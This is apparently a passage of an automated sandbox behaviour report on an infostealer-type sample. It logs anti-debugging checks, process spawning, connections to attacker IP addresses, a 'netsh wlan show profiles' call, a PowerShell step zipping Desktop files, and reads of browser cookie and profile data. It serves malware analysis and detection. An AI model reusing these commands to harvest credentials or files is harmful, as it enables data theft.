Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Code function: 0_2_051F0CAD rdtsc 0_2_051F0CAD
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Code function: 0_2_00BB7BBB mov eax, dword ptr fs:[00000030h] 0_2_00BB7BBB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Code function: 0_2_00BBB922 mov eax, dword ptr fs:[00000030h] 0_2_00BBB922
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_0073B922 mov eax, dword ptr fs:[00000030h] 2_2_0073B922
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00737BBB mov eax, dword ptr fs:[00000030h] 2_2_00737BBB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 3_2_0073B922 mov eax, dword ptr fs:[00000030h] 3_2_0073B922
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 3_2_00737BBB mov eax, dword ptr fs:[00000030h] 3_2_00737BBB
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Code function: 14_2_00395E8B mov eax, dword ptr fs:[00000030h] 14_2_00395E8B
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Code function: 14_2_00399B02 mov eax, dword ptr fs:[00000030h] 14_2_00399B02
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 193.233.132.56 80
Source: C:\Windows\System32\rundll32.exe Network Connect: 193.233.132.167 80
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe "C:\Users\user\AppData\Local\Temp\1000054001\amert.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe "C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe "C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe" Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe "C:\Users\user\AppData\Local\Temp\1000187001\build12.exe"
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: unknown unknown
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe
Source: C:\Windows\System32\rundll32.exe Process created: unknown unknown
Source: 831840b410.exe, 00000010.00000002.3114626852.0000000000D62000.00000002.00000001.01000000.00000011.sdmp, 831840b410.exe, 0000001F.00000000.2949970716.0000000000D62000.00000002.00000001.01000000.00000011.sdmp, 831840b410.exe, 0000002F.00000000.3200529574.0000000000D62000.00000002.00000001.01000000.00000011.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe, SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe, 00000000.00000002.2140172034.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp, explorha.exe, explorha.exe, 00000003.00000002.2151766410.0000000000932000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: ;Program Manager
Source: amert.exe, amert.exe, 0000000E.00000002.2840617908.0000000000556000.00000040.00000001.01000000.0000000F.sdmp, chrosha.exe, 0000000F.00000002.2880866448.0000000000266000.00000040.00000001.01000000.00000010.sdmp Binary or memory string: zProgram Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Code function: 14_2_0037CD47 cpuid 14_2_0037CD47
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\BJZFPPWAPT.docx VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\DUUDTUBZFW.xlsx VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\GRXZDKKVDB.docx VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\PALRGUCVEH.docx VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\ZGGKNSUKOP.xlsx VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe VolumeInformation
